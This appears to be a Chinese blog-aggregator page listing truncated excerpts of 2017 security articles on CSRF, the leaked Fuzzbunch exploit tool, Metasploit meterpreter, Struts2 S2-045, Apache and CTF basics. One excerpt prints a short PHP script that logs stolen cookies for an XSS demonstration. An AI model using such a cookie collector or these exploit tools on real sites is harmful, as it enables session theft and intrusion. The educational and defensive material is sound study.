跨站请求伪造(防护) 任何Web应用所面临的一个主要安全漏洞是跨站请求伪造,通常被简写为CSRF或XSRF,发音为"sea surf"。这个漏洞利用了浏览器的一个允许恶意攻击者在受害者网站注入脚本使未授权请求代表一个已登录用户的安全漏洞。 为了防范伪造POST请求,我们会要求每个请求包括一个参数值作 ...
分类:
其他好文 时间:
2017-04-25 00:43:24
阅读次数:
244
Shadow Brokers泄露出一份震惊世界的机密文档,其中包含了多个 Windows 远程漏洞利用工具。本文主要介绍了其中一款工具Fuzzbunch的分析与利用案例 1 整体目录介绍 解压EQGRP_Lost_in_Translation-master.zip文件(下载地址:https://gi ...
分类:
其他好文 时间:
2017-04-23 12:32:50
阅读次数:
316
利用视屏:https://v.qq.com/iframe/player.html?vid=g0393qtgvj0&tiny=0&auto=0 使用方法 环境搭建 注意,必须安装32位python2.6相关版本,其他版本不奏效。 配置环境 将EQGRP_Lost_in_Translation下载到的文 ...
vul--泛指漏洞 0day--未公开或虽已公开但还没有修复方法的漏洞 shellcode--远程溢出后执行的那段代码 payload--攻击载荷,送到远端机器执行的整段代码 poc--Proof of Concept,漏洞证明;可以是可以证明漏洞存在的文字描述和截图,但更多的一般是证明漏洞存在的代 ...
分类:
系统相关 时间:
2017-04-08 14:10:10
阅读次数:
394
Apache 作为Web应用的载体,一旦出现安全问题,那么运行在其上的Web应用的安全也无法得到保障,所以,研究Apache的漏洞与安全性非常有意义。本文将结合实例来谈谈针对Apache的漏洞利用和安全加固措施。 Apache HTTP Server(以下简称Apache)是Apache软件基金会的 ...
分类:
Web程序 时间:
2017-04-06 23:21:08
阅读次数:
306
0x01 meterpreter简介 MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 需要说明的是meterpreter在漏洞利用 ...
分类:
其他好文 时间:
2017-03-20 00:22:14
阅读次数:
273
一、跨站获取cookie1,hacker端(hacker.php)的程序如下:<?php$cookie=$_GET[‘cookie‘];$file=fopen("cookie.txt","a");fwrite($file,$cookie);fclose($file)?>2,受害者端(victim.php)的程序如下:<html><head><title>xss跨站原理复现</title&..
分类:
其他好文 时间:
2017-03-10 11:18:31
阅读次数:
250
写这篇直播文章之前声明一下,我不是hacker。至于漏洞利用更不是我的强项。漏洞利用只是我的一个爱好。呵呵---怎么敲出来之后感觉有些zb,不管了。最近一个新的高危漏洞(struts2)被公布,看到群里有人上传了一个poc随即立马取消,众小hacker纷纷唾沫横飞,其实完全不必,网上早已..
分类:
其他好文 时间:
2017-03-09 15:44:18
阅读次数:
172
申明:本文所介绍的脚本和方法均来自互联网,收集的目的仅供安全研究使用,网站运维人员可以使用本文介绍的脚本和方法评估自身网站的安全性,并尽快发现和修复网站存在的漏洞。对于使用本文脚本和方法所造成的任何后果,由使用者自行承担,作者不承担任何后果。 S2-045漏洞为一个远程RCE漏洞,利用该漏洞不需要任 ...
分类:
其他好文 时间:
2017-03-08 10:57:03
阅读次数:
3083
转自http://www.cnblogs.com/christychang/p/6032532.html ctf入门指南 如何入门?如何组队? capture the flag 夺旗比赛 类型: Web密码学pwn 程序的逻辑分析,漏洞利用windows、linux、小型机等misc 杂项,隐写,数 ...
分类:
其他好文 时间:
2017-02-05 12:23:01
阅读次数:
293